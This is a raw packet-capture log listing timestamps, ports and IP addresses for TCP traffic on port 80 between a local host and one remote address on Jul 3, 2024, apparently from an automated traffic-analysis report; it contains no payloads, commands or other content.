Jul 3, 2024 18:08:40.314050913 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.314050913 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.314053059 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.314064980 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.314104080 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.314104080 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.314173937 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.314186096 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.314253092 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.314265013 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.314275980 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.314285994 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.314285994 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.314289093 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.314301014 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.314312935 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.314336061 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.314336061 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.314378977 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.314531088 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.314543009 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.314553022 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.314563990 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.314575911 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.314575911 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.314735889 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.314745903 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.314755917 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.314755917 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.314757109 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.314769030 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.314781904 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.314793110 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.314795017 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.314795017 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.314832926 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.314836979 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.314845085 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.314862967 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.314877033 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.314883947 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.314883947 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.314888954 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.314899921 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.314903021 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.314910889 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.314920902 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.314932108 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.314959049 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.314959049 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.315160036 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.315310001 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.315321922 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.315334082 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.315345049 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.315474033 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.315486908 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.315496922 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.315496922 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.315510035 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.315519094 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.315521002 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.315534115 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.315543890 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.315551043 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.315556049 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.315567970 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.315579891 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.315591097 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.315593004 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.315593004 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.315602064 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.315654039 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.315654993 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.315654993 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.315952063 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.315963030 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.315974951 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.315987110 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.315999985 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.316004038 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.316011906 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.316036940 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.316036940 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.316061020 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.316236019 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.316247940 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.316257000 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.316267967 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.316281080 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.316293955 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.316304922 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.316308975 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.316308975 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.316315889 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.316329002 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.316343069 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.316343069 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.316376925 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.316478014 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.316494942 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.316570997 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.316581964 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.316592932 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.316605091 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.316606045 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.316606045 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.316615105 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.316658020 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.316658020 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.401180983 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.401204109 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.401223898 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.401235104 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.401247025 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.401258945 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.401367903 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.401379108 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.401395082 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.401407003 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.401406050 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.401406050 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.401418924 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.401442051 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.401442051 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.401480913 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.401482105 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.401547909 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.401560068 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.401568890 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.401581049 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.401592016 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.401606083 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.401606083 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.401654005 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.401684046 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.401695013 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.401705980 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.401717901 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.401720047 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.401747942 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.401782036 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.401945114 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.401957035 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.401967049 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.401977062 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.401988983 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.401999950 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.402010918 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.402023077 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.402033091 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.402033091 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.402033091 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.402045965 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.402057886 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.402059078 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.402059078 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.402111053 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.402137041 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.402255058 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.402266979 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.402278900 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.402290106 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.402318001 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.402381897 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.402390003 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.402394056 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.402434111 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.402466059 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.402477980 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.402507067 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.402575016 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.402585983 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.402597904 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.402609110 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.402621984 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.402630091 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.402635098 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.402673006 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.402673006 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.402833939 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.402846098 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.402863979 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.402874947 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.402885914 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.402898073 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.402909040 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.402915001 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.402915001 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.402920008 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.402932882 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.402945042 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.402957916 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.402957916 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.402959108 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.403002024 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.403002024 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.403215885 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.403227091 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.403263092 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.403346062 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.403357983 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.403368950 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.403379917 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.403387070 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.403392076 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.403403997 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.403415918 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.403424025 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.403428078 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.403461933 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.403461933 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.403558016 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.403595924 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.403609037 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.403609991 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.403620958 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.403639078 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.403664112 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.403664112 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.596178055 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.601125956 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.772926092 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.772952080 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.772964001 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.772990942 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.773021936 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.773027897 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.773041010 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.773052931 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.773061991 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.773091078 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.773154020 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.773165941 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.773176908 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.773190975 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.773219109 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.773241997 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.773252964 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.773263931 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.773274899 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.773276091 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.773287058 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.773303032 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.773329973 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.773447990 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.773458958 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.773469925 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.773483038 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.773509979 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.773509979 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.773529053 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.773549080 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.773561001 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.773576021 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.773582935 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.773586988 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.773610115 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.773633957 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.773705006 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.773715019 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.773726940 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.773747921 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.773773909 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.773780107 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.773792982 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.773803949 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.773814917 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.773825884 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.773832083 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.773853064 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.773868084 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.774034023 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.774045944 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.774055958 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.774070024 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.774086952 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.774089098 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.774099112 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.774110079 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.774122000 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.774122953 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.774133921 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.774146080 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.774174929 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.774353981 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.774514914 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.774535894 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.774547100 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.774558067 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.774568081 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.774569035 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.774580002 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.774584055 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.774590969 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.774600029 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.774601936 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.774614096 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.774626017 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.774636984 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.774636984 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.774636984 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.774647951 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.774660110 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.774663925 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.774672031 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.774687052 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.774693012 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.774698973 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.774708986 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.774709940 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.774739981 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.774780989 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.775057077 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.775068045 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.775079012 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.775090933 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.775099993 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.775103092 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.775115013 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.775136948 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.775224924 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.775248051 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.775259972 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.775301933 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.855554104 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.855566978 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.855586052 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.855597973 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.855609894 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.855619907 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:40.855622053 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:40.855649948 CEST	49710	80	192.168.2.6	85.28.47.4
